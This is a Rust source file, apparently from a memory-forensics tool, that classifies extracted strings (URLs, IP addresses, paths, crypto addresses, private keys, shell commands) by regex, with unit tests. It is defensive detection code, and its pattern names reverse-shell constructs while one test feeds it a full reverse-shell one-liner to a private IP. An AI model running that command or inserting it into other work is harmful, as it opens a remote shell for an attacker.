Skip to main content

memf_strings/
regex_classifier.rs

1//! Regex-based string classifier for URLs, IPs, emails, paths, and credentials.
2
3use crate::classify::StringClassifier;
4use crate::StringCategory;
5use regex::Regex;
6use std::sync::OnceLock;
7
/// One compiled row of the classification table: a regex together with the
/// category and confidence reported when that regex matches an input.
struct PatternEntry {
    /// Compiled form of the pattern source string.
    regex: Regex,
    /// Category emitted by the classifier when `regex` matches.
    category: StringCategory,
    /// Confidence value emitted alongside `category` on a match.
    confidence: f32,
}
13
14/// Static (pattern, category, confidence) classification table.
15///
16/// Patterns are compile-time-constant and known-valid; building the live
17/// `PatternEntry` table filters out any that fail to compile (defence in
18/// depth) rather than panicking, so a future bad edit degrades to a missing
19/// category instead of an abort.
20const PATTERN_SPECS: &[(&str, StringCategory, f32)] = &[
21    (
22        "(?i)^https?://[^\\s<>\"'{}|\\\\^`\\[\\]]+$",
23        StringCategory::Url,
24        0.90,
25    ),
26    (
27        r"^(?:(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]\d|\d)\.){3}(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]\d|\d)$",
28        StringCategory::IpV4,
29        0.95,
30    ),
31    // IPv6: full 8-group, compressed (::), loopback (::1), etc.
32    // Covers RFC 5952 canonical forms without interface ID suffixes.
33    (
34        concat!(
35            r"^(?:[0-9a-fA-F]{1,4}:){7}[0-9a-fA-F]{1,4}$",
36            r"|^(?:[0-9a-fA-F]{1,4}:){1,7}:$",
37            r"|^::(?:[0-9a-fA-F]{1,4}:){0,6}[0-9a-fA-F]{1,4}$",
38            r"|^::$",
39            r"|^(?:[0-9a-fA-F]{1,4}:){1,6}:[0-9a-fA-F]{1,4}$",
40            r"|^(?:[0-9a-fA-F]{1,4}:){1,5}(?::[0-9a-fA-F]{1,4}){1,2}$",
41            r"|^(?:[0-9a-fA-F]{1,4}:){1,4}(?::[0-9a-fA-F]{1,4}){1,3}$",
42            r"|^(?:[0-9a-fA-F]{1,4}:){1,3}(?::[0-9a-fA-F]{1,4}){1,4}$",
43            r"|^(?:[0-9a-fA-F]{1,4}:){1,2}(?::[0-9a-fA-F]{1,4}){1,5}$",
44            r"|^[0-9a-fA-F]{1,4}:(?::[0-9a-fA-F]{1,4}){1,6}$",
45        ),
46        StringCategory::IpV6,
47        0.95,
48    ),
49    (
50        r"^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$",
51        StringCategory::Email,
52        0.90,
53    ),
54    (
55        r"^/(?:usr|etc|var|tmp|home|opt|dev|proc|sys|root|bin|sbin|lib|mnt|run|srv)/[^\s:*?<>|]+$",
56        StringCategory::UnixPath,
57        0.85,
58    ),
59    (
60        r"(?i)^[A-Z]:\\(?:[^\\/:*?<>|\r\n]+\\)*[^\\/:*?<>|\r\n]*$",
61        StringCategory::WindowsPath,
62        0.85,
63    ),
64    (
65        r"(?i)^HK(?:EY_(?:LOCAL_MACHINE|CURRENT_USER|CLASSES_ROOT|USERS|CURRENT_CONFIG)|LM|CU|CR)\\",
66        StringCategory::RegistryKey,
67        0.95,
68    ),
69    (
70        r"^[13][a-km-zA-HJ-NP-Z1-9]{25,34}$",
71        StringCategory::CryptoAddress,
72        0.70,
73    ),
74    (r"^0x[0-9a-fA-F]{40}$", StringCategory::CryptoAddress, 0.80),
75    (
76        r"^bc1[a-zA-HJ-NP-Z0-9]{25,39}$",
77        StringCategory::CryptoAddress,
78        0.85,
79    ),
80    (
81        r"-----BEGIN (?:RSA |EC |OPENSSH |DSA )?PRIVATE KEY-----",
82        StringCategory::PrivateKey,
83        0.99,
84    ),
85    (
86        r"^[A-Za-z0-9+/]{20,}={0,2}$",
87        StringCategory::Base64Blob,
88        0.40,
89    ),
90    (
91        r"/dev/tcp/|/dev/udp/|pty\.spawn|os\.dup2\(|bash\s+-i\s+>&",
92        StringCategory::ShellCommand,
93        0.90,
94    ),
95];
96
97fn patterns() -> &'static [PatternEntry] {
98    static PATTERNS: OnceLock<Vec<PatternEntry>> = OnceLock::new();
99    PATTERNS.get_or_init(|| {
100        PATTERN_SPECS
101            .iter()
102            .filter_map(|(pat, category, confidence)| {
103                Regex::new(pat).ok().map(|regex| PatternEntry {
104                    regex,
105                    category: category.clone(),
106                    confidence: *confidence,
107                })
108            })
109            .collect()
110    })
111}
112
/// A classifier that uses compiled regexes to categorize strings.
///
/// This is a stateless unit type: the compiled pattern table is shared and
/// built lazily on first use, so values are free to copy and construct.
#[derive(Debug, Clone, Copy, Default)]
pub struct RegexClassifier;
115
116impl StringClassifier for RegexClassifier {
117    fn name(&self) -> &str {
118        "regex"
119    }
120
121    fn classify(&self, input: &str) -> Vec<(StringCategory, f32)> {
122        let mut results = Vec::new();
123        for entry in patterns() {
124            if entry.regex.is_match(input) {
125                results.push((entry.category.clone(), entry.confidence));
126            }
127        }
128        results
129    }
130}
131
// Submits the classifier to the `inventory` crate's registry as a
// `&'static dyn StringClassifier`.
// NOTE(review): presumably gathered elsewhere in the crate via
// `inventory::collect!` / `inventory::iter` — confirm against the consumer.
inventory::submit!(&RegexClassifier as &'static dyn StringClassifier);
133
#[cfg(test)]
mod tests {
    use super::*;

    /// Runs the regex classifier on `input` and returns its raw results.
    fn classify(input: &str) -> Vec<(StringCategory, f32)> {
        RegexClassifier.classify(input)
    }

    #[test]
    fn all_pattern_specs_compile() {
        // `patterns()` silently drops any spec whose regex fails to compile,
        // so require a one-to-one table to catch a bad pattern edit here
        // instead of as a quietly missing category at runtime.
        assert_eq!(patterns().len(), PATTERN_SPECS.len());
    }

    #[test]
    fn classifies_url() {
        let r = classify("https://evil.com/payload.exe");
        assert!(r.iter().any(|(c, _)| *c == StringCategory::Url));
    }

    #[test]
    fn classifies_ipv4() {
        let r = classify("192.168.1.1");
        assert!(r.iter().any(|(c, _)| *c == StringCategory::IpV4));
    }

    #[test]
    fn classifies_email() {
        let r = classify("user@example.com");
        assert!(r.iter().any(|(c, _)| *c == StringCategory::Email));
    }

    #[test]
    fn classifies_unix_path() {
        let r = classify("/etc/passwd");
        assert!(r.iter().any(|(c, _)| *c == StringCategory::UnixPath));
    }

    #[test]
    fn classifies_windows_path() {
        let r = classify("C:\\Windows\\System32\\cmd.exe");
        assert!(r.iter().any(|(c, _)| *c == StringCategory::WindowsPath));
    }

    #[test]
    fn classifies_registry_key() {
        let r = classify("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft");
        assert!(r.iter().any(|(c, _)| *c == StringCategory::RegistryKey));
    }

    #[test]
    fn classifies_ethereum_address() {
        let r = classify("0x742d35Cc6634C0532925a3b844Bc9e7595f2bD28");
        assert!(r.iter().any(|(c, _)| *c == StringCategory::CryptoAddress));
    }

    #[test]
    fn classifies_pem_private_key() {
        let r = classify("-----BEGIN RSA PRIVATE KEY-----");
        assert!(r.iter().any(|(c, _)| *c == StringCategory::PrivateKey));
    }

    #[test]
    fn classifies_shell_command() {
        let r = classify("bash -i >& /dev/tcp/10.0.0.1/4444 0>&1");
        assert!(r.iter().any(|(c, _)| *c == StringCategory::ShellCommand));
    }

    #[test]
    fn no_match_for_garbage() {
        let r = classify("xyzq");
        assert!(r.is_empty());
    }

    #[test]
    fn classifies_btc_legacy_address() {
        // BTC legacy addresses start with 1 or 3
        let r = classify("1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa");
        assert!(r.iter().any(|(c, _)| *c == StringCategory::CryptoAddress));
    }

    #[test]
    fn classifies_btc_bech32_address() {
        // BTC bech32 addresses start with bc1
        let r = classify("bc1qw508d6qejxtdg4y5r3zarvary0c5xw7kv8f3t4");
        assert!(r.iter().any(|(c, _)| *c == StringCategory::CryptoAddress));
    }

    #[test]
    fn classifies_base64_blob() {
        let r = classify("SGVsbG8gV29ybGQhIFRoaXMgaXMgYSBiYXNlNjQgdGVzdA==");
        assert!(r.iter().any(|(c, _)| *c == StringCategory::Base64Blob));
    }

    #[test]
    fn classifier_name() {
        let classifier = RegexClassifier;
        assert_eq!(classifier.name(), "regex");
    }

    #[test]
    fn classifies_http_url() {
        let r = classify("http://example.com/page");
        assert!(r.iter().any(|(c, _)| *c == StringCategory::Url));
    }

    #[test]
    fn classifies_private_key_variants() {
        let r = classify("-----BEGIN PRIVATE KEY-----");
        assert!(r.iter().any(|(c, _)| *c == StringCategory::PrivateKey));

        let r2 = classify("-----BEGIN EC PRIVATE KEY-----");
        assert!(r2.iter().any(|(c, _)| *c == StringCategory::PrivateKey));

        let r3 = classify("-----BEGIN OPENSSH PRIVATE KEY-----");
        assert!(r3.iter().any(|(c, _)| *c == StringCategory::PrivateKey));
    }

    #[test]
    fn classifies_ipv6_full() {
        // Full 8-group IPv6 address
        let r = classify("2001:0db8:85a3:0000:0000:8a2e:0370:7334");
        assert!(
            r.iter().any(|(c, _)| *c == StringCategory::IpV6),
            "expected IpV6 classification for a full IPv6 address"
        );
    }

    #[test]
    fn classifies_ipv6_compressed() {
        // Compressed IPv6 with :: notation
        let r = classify("::1");
        assert!(
            r.iter().any(|(c, _)| *c == StringCategory::IpV6),
            "expected IpV6 classification for loopback ::1"
        );
    }

    #[test]
    fn classifies_ipv6_mixed_notation() {
        // Despite the name, this exercises a link-local address with and
        // without a zone (interface) ID, not mixed IPv4/IPv6 notation.
        //
        // The IPv6 patterns are fully anchored and accept only hex groups and
        // colons, so a `%eth0` zone suffix must prevent an IpV6 match.
        let with_zone = classify("fe80::1%eth0");
        assert!(
            !with_zone.iter().any(|(c, _)| *c == StringCategory::IpV6),
            "interface ID suffixes are unsupported and must not classify as IpV6"
        );

        // The same address without the interface suffix must match.
        let r2 = classify("fe80::1");
        assert!(
            r2.iter().any(|(c, _)| *c == StringCategory::IpV6),
            "expected IpV6 classification for fe80::1 link-local"
        );
    }
}